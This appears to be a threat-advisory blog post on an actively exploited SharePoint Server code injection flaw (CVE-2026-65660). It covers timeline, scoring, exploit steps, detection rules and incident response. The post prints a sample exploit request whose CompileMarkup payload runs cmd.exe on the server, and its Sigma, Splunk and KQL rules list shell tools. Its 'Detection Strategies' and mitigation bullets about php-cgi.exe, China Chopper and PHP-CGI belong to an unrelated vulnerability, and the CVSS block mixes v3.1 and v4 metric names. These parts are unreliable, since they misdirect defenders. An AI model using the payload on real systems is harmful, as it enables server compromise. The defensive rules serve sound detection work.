Cyber Pulse: Technical Threat Deep Dives on Active CVEs — Microsoft SharePoint Server Remote Code Execution (CVE-2026-65660)

Intro

Active in-the-wild exploitation has been observed targeting Microsoft SharePoint Server via CVE-2026-65660, a high-severity code injection vulnerability that allows authenticated attackers with low-level privileges to achieve remote code execution. Originally disclosed during the August 2026 Patch Tuesday cycle, threat actors began operationalizing public technical details in late September 2026, dropping web shell backdoors on exposed enterprise servers and prompting immediate CISA Known Exploited Vulnerabilities (KEV) catalog inclusion.

CVE Context

– Products & versions affected:
Microsoft SharePoint Enterprise Server 2016 (prior to build 16.0.5565.1001)
Microsoft SharePoint Server 2019 (prior to build 16.0.10417.20198)
Microsoft SharePoint Server Subscription Edition (prior to build 16.0.19725.20522)
– Disclosure timeline:
August 11, 2026: Coordinated disclosure and security update released by Microsoft.
Late September 2026: Viettel Security published technical analysis; threat actors weaponized proof-of-concept vectors.
September 24-25, 2026: In-the-wild honeypot exploitation and web shell deployments recorded.
September 25, 2026: Added to CISA KEV catalog under federal Binding Operational Directive enforcement.
– Attack vector, auth level, impact:
Network-accessible, authenticated (low privilege), high confidentiality, integrity, and availability impact.

CVSS Metric Breakdown (v3.1) - CVE-2026-65660 (SharePoint Code Injection RCE)
Attack Vector (AV): Network (N)
Attack Complexity (AC): Low (L)
Privileges Required (PR): Low (L)
User Interaction (UI): None (N)
Confidentiality Impact (VC): High (H)
Integrity Impact (VI): High (H)
Availability Impact (VA): High (H)
Scope Changed (SC): Unchanged (U)
Safety Impact (SI): Not Applicable
Automation (SA): Not Applicable
Exploit Maturity: Functional / Proof of Concept in the Wild
Base Score: 8.8 (High)

– Exploit tools, payloads observed, confirmed victims, global exposure count if known: Threat actors have been observed executing automated two-stage payload drops delivering ASPX/ASHX web shell backdoors directly to w3wp worker processes. Shodan and Censys telemetry reveal thousands of internet-exposed on-premises SharePoint endpoints worldwide.

EPSS Scoring

EPSS Probability: 0.02101

EPSS Percentile: 0.81009

The Exploit Prediction Scoring System (EPSS) rating places CVE-2026-65660 at an estimated 2.10% probability of active exploitation in the wild over the next 30 days, ranking it higher than 81.01% of all scored vulnerabilities globally. While a 2.10% nominal probability appears moderate on surface review, placing above the 81st percentile combined with confirmed CISA KEV status establishes this as an immediate operational priority for patch verification and forensic validation.

Exploitation Detail

– Step-by-step breakdown:
1. An attacker establishes an authenticated session using compromised low-privilege domain or SharePoint member credentials.
2. The attacker crafts a targeted HTTP POST request toward an internal SharePoint processing endpoint handling serialized server-side data models.
3. Flawed type-validation routines fail to properly sanitize dynamic object deserialization and parameter injection.
4. The injected payload invokes arbitrary server-side methods within the context of the IIS worker process (w3wp.exe).
– Where it lives: Type-checking and input validation parsers within core SharePoint server assemblies handling serialized application state and dynamic page compilation.

POST /_vti_bin/client.svc/ProcessQuery HTTP/1.1
Host: sharepoint.target-domain.local
Authorization: NTLM TlRMTVNTUAABAAA...
Content-Type: text/xml; charset=utf-8
X-RequestDigest: 0x8A...<Request AddExpandoFieldTypeSuffix="true" SchemaVersion="15.0.0.0" LibraryVersion="16.0.0.0" xmlns="http://schemas.microsoft.com/sharepoint/clientquery/2009">
<Actions>
<ObjectPath Id="2" ObjectPathId="1" />
<Method Name="CompileMarkup" Id="3" ObjectPathId="1">
<Parameters>
<Parameter Type="String"><![CDATA[<%@ Page Language="C#" %><% System.Diagnostics.Process.Start("cmd.exe","/c whoami > C:\inetpub\wwwroot\out.txt"); %>]]></Parameter>
</Parameters>
</Method>
</Actions>
<ObjectPaths>
<StaticMethod Id="1" TypeId="{F6B431D0-179B-4D24-8D29-566A1F7A2DC1}" Name="CreateInstance" />
</ObjectPaths>
</Request>

Attacker Behavior Snapshot

– What the attacker sends: Malformed serialized XML/JSON POST requests containing embedded compilation directives or type-check override parameters directed at SharePoint client endpoints (_vti_bin/client.svc, /_layouts/15/).
– What the system does: The underlying application pool worker (w3wp.exe) fails to enforce strict type checking, deserializes the untrusted object, and compiles or executes the embedded payload using the privileges of the SharePoint service account (often local SYSTEM or highly privileged domain accounts).
– What leaks back: Detailed CLR stack traces, internal netBIOS/FQDN machine paths, ASP.NET session tokens, and output from injected commands rendered directly in HTTP 200/500 response bodies.

Why This Matters

This vulnerability highlights how legacy configurations become high-value targets. On-premises collaboration suites bridge internal document repositories and Active Directory, turning a single compromised workstation or low-tier service account into a pipeline for enterprise-wide compromise.

Exploitation results in:

  • Full command execution on web servers
  • Untraceable persistence via web shells
  • Rapid lateral movement if not detected early

MITRE ATT&CK Mapping

Initial Access: T1190 – Exploit Public-Facing Application
Execution: T1059.003 – Command Shell
Persistence: T1505.003 – Server Software Component

Detection Rules

YARA Rule (Memory/Doc/PCAP)

rule APT_Webshell_SharePoint_CVE_2026_65660 {
meta:
description = "Detects web shells dropped via CVE-2026-65660 SharePoint exploitation"
author = "Cyber Pulse Threat Research"
date = "2026-09-30"
severity = "Critical"
strings:
$str1 = "<%@ Page Language=" ascii nocase
$str2 = "Process.Start" ascii wide
$str3 = "client.svc/ProcessQuery" ascii wide
$str4 = "SPPageContentManager" ascii wide
$magic = { 3C 25 40 20 }
condition:
$magic at 0 and ($str1 and ($str2 or ($str3 and $str4)))
}

Suricata or Zeek (Network)

alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible Microsoft SharePoint CVE-2026-65660 Code Injection"; flow:established,to_server; content:"POST"; http_method; content:"/client.svc/ProcessQuery"; http_uri; content:"CompileMarkup"; nocase; content:"System.Diagnostics.Process"; nocase; classtype:attempted-admin; sid:2026656; rev:1;)

Sigma Rule (SIEM/EDR)

title: SharePoint w3wp.exe Spawning Interactive Command Shell
id: b5e4128f-7c19-4a48-a0d3-34e857829a24
status: experimental
description: Detects Microsoft SharePoint IIS worker process spawning command interpreters or script hosts.
references:
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-65660
author: Cyber Pulse
date: 2026-09-30
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith: '\w3wp.exe'
Image|endswith:
- '\cmd.exe'
- '\powershell.exe'
- '\pwsh.exe'
- '\wscript.exe'
- '\cscript.exe'
- '\certutil.exe'
condition: selection
falsepositives:
- Rare administrative deployment scripts run through web consoles (verify parent command line)
level: critical
tags:
- attack.execution
- attack.t1059.003
- attack.initial_access
- attack.t1190

Detection Strategies

Network Detection:

  • Look for suspicious HTTP POST requests to php-cgi.exe
  • Detect URL-encoded payloads with %0a, &, or |
  • Flag legacy user-agents such as MSIE 6.0 or default China Chopper signatures

Endpoint Detection:

  • php-cgi.exe spawning cmd.exe or powershell.exe
  • Unexpected script file creation in C:\inetpub\wwwroot\
  • Look for command-line logging or scheduled task creation tied to web server processes

Splunk Query

index=main sourcetype="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1
ParentImage="*\\w3wp.exe" Image IN ("*\\cmd.exe", "*\\powershell.exe", "*\\whoami.exe", "*\\net.exe")
| stats count min(_time) as first_seen max(_time) as last_seen by host, user, ParentCommandLine, CommandLine
| convert ctime(first_seen) ctime(last_seen)
| sort - count

SOC Detection Strategy

– Triage levels, log sources, alert logic:
P1 Critical: Any alert indicating w3wp.exe spawning interactive shells (cmd.exe, powershell.exe) or reconnaissance utilities (whoami.exe, nltest.exe) on SharePoint tier servers.
P2 High: Network detection of anomalous POST requests to client.svc containing serialized code compilation markup.
Log Sources Required: Windows Event ID 4688 with full command-line arguments, Sysmon Event ID 1 (Process Creation), Sysmon Event ID 11 (File Create), IIS W3C Logs, and WAF HTTP telemetry.
– How to tune and escalate:
Correlate endpoint process execution timestamps directly against IIS CS-URI-Stem logs. If an unexpected binary execution occurs within milliseconds of a client.svc POST request from an external IP, escalate immediately to full containment and incident response.
– What real-world alerts might look like:
“EDR Alert: Anomalous Parent-Child Execution – w3wp.exe spawned powershell.exe with base64 encoded arguments on SHAREPOINT01.”

Tools & Techniques

Tool | Usage
Sysmon | Detect parent-child anomalies
Velociraptor | Endpoint hunting for shell commands
Zeek | HTTP signature logging and anomaly detection
Sigma/YARA | Create detection rules for known web shell patterns

Mitigation & Response

– Patch info: Apply the official Microsoft August 2026 security updates for SharePoint (KB5002905 and related cumulative rollups for Enterprise 2016, 2019, and Subscription Edition).
– Temporary mitigations (GPOs, ACLs, WAF): Restrict internal access to SharePoint administrative endpoints; place public-facing SharePoint farms behind a reverse proxy enforcing strict inspection of POST requests to /_vti_bin/ and /_layouts/ paths.
– Config changes, credential rotation, MFA enforcement, registry edits:
Enforce Multi-Factor Authentication across all accounts with network access to SharePoint to limit low-privilege authentication vector abuse.
– Use a WAF to block suspicious characters in user input (e.g., %0a, &, |)
– Disable legacy components (e.g., PHP-CGI) if not needed
– Monitor for lateral movement post-compromise

Incident Response Snippets

– Log queries (grep, Splunk, KQL):
KQL:
DeviceProcessEvents
| where InitiatingProcessFileName =~ “w3wp.exe”
| where FileName in~ (“cmd.exe”, “powershell.exe”, “whoami.exe”, “net.exe”)
| project Timestamp, DeviceName, ActionType, FileName, ProcessCommandLine, InitiatingProcessCommandLine
– IR questions to ask:
1. Which accounts authenticated against the SharePoint farm immediately prior to the observed execution?
2. Was the parent process running under the local Network Service, Local System, or a delegated Active Directory service account?
3. Did the child process establish secondary outbound network connections to external IP addresses?
– Cleanup and movement checks:
Inspect C:\inetpub\wwwroot\ and SharePoint hive directories (C:\Program Files\Common Files\microsoft shared\Web Server Extensions\) for newly dropped .aspx or .ashx files created within the incident window.

Suggested Reading & External References

– Official advisories:
Microsoft Security Update Guide: CVE-2026-65660
CISA Known Exploited Vulnerabilities Catalog
– Trusted writeups:
SecurityWeek: Microsoft SharePoint Flaw CVE-2026-65660 Now Exploited in Attacks
– Related CVEs or historic cases:
Related enterprise code injection flaws include CVE-2023-29357 (SharePoint Authentication Bypass) and CVE-2023-24955 (SharePoint RCE chain).

Final Thoughts

– One-sentence summary of exploit path: Threat actors leverage low-privilege authenticated access to inject code into unvalidated SharePoint server-side compilation endpoints, achieving SYSTEM-level execution via w3wp worker processes.
– Most effective action to take now: Verify deployment of Microsoft cumulative updates across all on-premises SharePoint tiers and hunt for anomalous w3wp child processes across EDR logs.
– Reminder that detection is field work.

Published: September 30, 2026

Leave a comment